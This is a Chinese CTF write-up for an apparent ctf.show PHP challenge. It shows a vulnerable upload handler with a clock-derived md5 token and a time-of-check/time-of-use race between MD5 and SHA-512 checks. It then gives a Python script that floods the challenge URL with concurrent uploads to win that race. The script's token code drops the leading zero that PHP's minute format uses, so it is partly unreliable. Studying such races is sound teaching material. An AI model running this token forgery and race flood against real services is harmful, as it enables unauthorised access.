题目:
/**
 * Persist the raw request body to $receiveFile.
 *
 * The body is taken from the legacy $GLOBALS['HTTP_RAW_POST_DATA'] entry when
 * that is set and non-empty, otherwise from the php://input stream.
 *
 * @param string $receiveFile Destination path; the caller in this listing always passes a fixed name.
 * @return int|false Result of file_put_contents(), or false when there is no body to write.
 */
function receiveStreamFile($receiveFile){
    $body = '';
    if (isset($GLOBALS['HTTP_RAW_POST_DATA'])) {
        $body = $GLOBALS['HTTP_RAW_POST_DATA'];
    }
    if (empty($body)) {
        // Fall back to reading the request body stream directly.
        $body = file_get_contents('php://input');
    }
    if ($body == '') {
        // Nothing was posted (or the read failed): report failure, write nothing.
        return false;
    }
    // NOTE(review): the third parameter of file_put_contents() is a flags bitmask;
    // `true` is coerced to 1, the value of FILE_USE_INCLUDE_PATH. No lock flag is
    // passed, so concurrent requests can overwrite the same path freely.
    return file_put_contents($receiveFile, $body, true);
}
// Request handler (file-scope flow): token gate, store the upload, then two hash checks.
// NOTE(review): $token and $flag are not defined anywhere in this listing; presumably
// $token comes from the request and $flag from an include. Confirm against the full file.
// Gate: $token must equal md5() of the server's current minute (date("i"), "00".."59").
// Only 60 values exist and each follows from the clock, so this is not a secret.
if(md5(date("i")) === $token){
// Every request writes to the same fixed path, so concurrent requests share one file.
$receiveFile = 'flag.dat';
// The return value is discarded, so a failed or empty write is not detected here.
receiveStreamFile($receiveFile);
// Check 1: MD5 of the on-disk upload must equal MD5 of key.dat (both read from disk now).
if(md5_file($receiveFile)===md5_file("key.dat")){
// Check 2: SHA-512 of the upload must DIFFER from key.dat. flag.dat is read from disk
// a second time here, so the bytes hashed are not guaranteed to be the bytes hashed in
// check 1 if another request rewrote the file in between (time-of-check/time-of-use gap).
// Hashing one in-memory copy of the body for both checks, or writing each request to its
// own temporary file, would remove that window.
// This comparison uses loose != while the two checks above use strict ===.
if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
// Success response; the message string interpolates $flag.
$ret['success']="1";
$ret['msg']="人脸识别成功!$flag";
$ret['error']="0";
echo json_encode($ret);
// return at file scope ends the script for this request.
return;
}
// MD5 and SHA-512 both matched: the stored upload is byte-identical to key.dat.
$ret['errormsg']="same file";
echo json_encode($ret);
return;
}
// MD5 of the stored upload did not match key.dat.
$ret['errormsg']="md5 error";
echo json_encode($ret);
return;
}
// Token did not match md5 of the current minute.
$ret['errormsg']="token error";
echo json_encode($ret);
return;
思路:
1.构造token
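2.先上传一模一样的key.dat,通过md5值的比较
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。之所以可行,是因为服务端对同一个固定路径flag.dat先后两次从磁盘读取并分别计算MD5和SHA-512,两次读取之间文件可能被另一个请求覆盖,属于检查与使用不一致(TOCTOU)的条件竞争;若两种哈希都基于同一份内存中的请求数据计算,或每个请求写入各自的临时文件,这个时间窗口就不存在。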
脚本:
下面的脚本给出了两种并发写法:法一使用线程池(ThreadPoolExecutor),法二手动创建线程(threading,已注释)。
import time
import hashlib
import requests
# import threading #法二
from concurrent.futures import ThreadPoolExecutor #法一
# Challenge token: MD5 hex digest of the current local minute, rendered with str().
i = str(time.localtime().tm_min)
token = hashlib.md5(i.encode()).hexdigest()

# Files whose contents will be posted.
file_paths = ['key.dat', 'key2.dat']
url = "https://a9a37cc7-8ff5-4587-b072-bcae28577c50.challenge.ctf.show/check.php?token={}&php://input".format(token)


def _read_bytes(path):
    """Return the full binary contents of *path*."""
    with open(path, 'rb') as fh:
        return fh.read()


# Load every file once up front so the request threads do no disk I/O.
file_datas = {file_path: _read_bytes(file_path) for file_path in file_paths}
# 上传文件函数
def upload_file(file_path):
    """POST the preloaded bytes for *file_path* to ``url``.

    The response body is printed only when it contains the marker "ctfshow";
    every other response is dropped silently.
    """
    body = requests.post(url, file_datas[file_path]).text
    if "ctfshow" in body:
        print(body)
# for i in range(50): #法二
# threading.Thread(target=upload_file, args=('key.dat',)).start()
# for i in range(50):
# threading.Thread(target=upload_file, args=('key2.dat',)).start()
# Approach 1: thread pool. Each round queues one upload per loaded file;
# results are never collected, so exceptions raised inside workers are not surfaced.
with ThreadPoolExecutor() as pool:
    for _ in range(200):
        for name in file_datas:
            pool.submit(upload_file, name)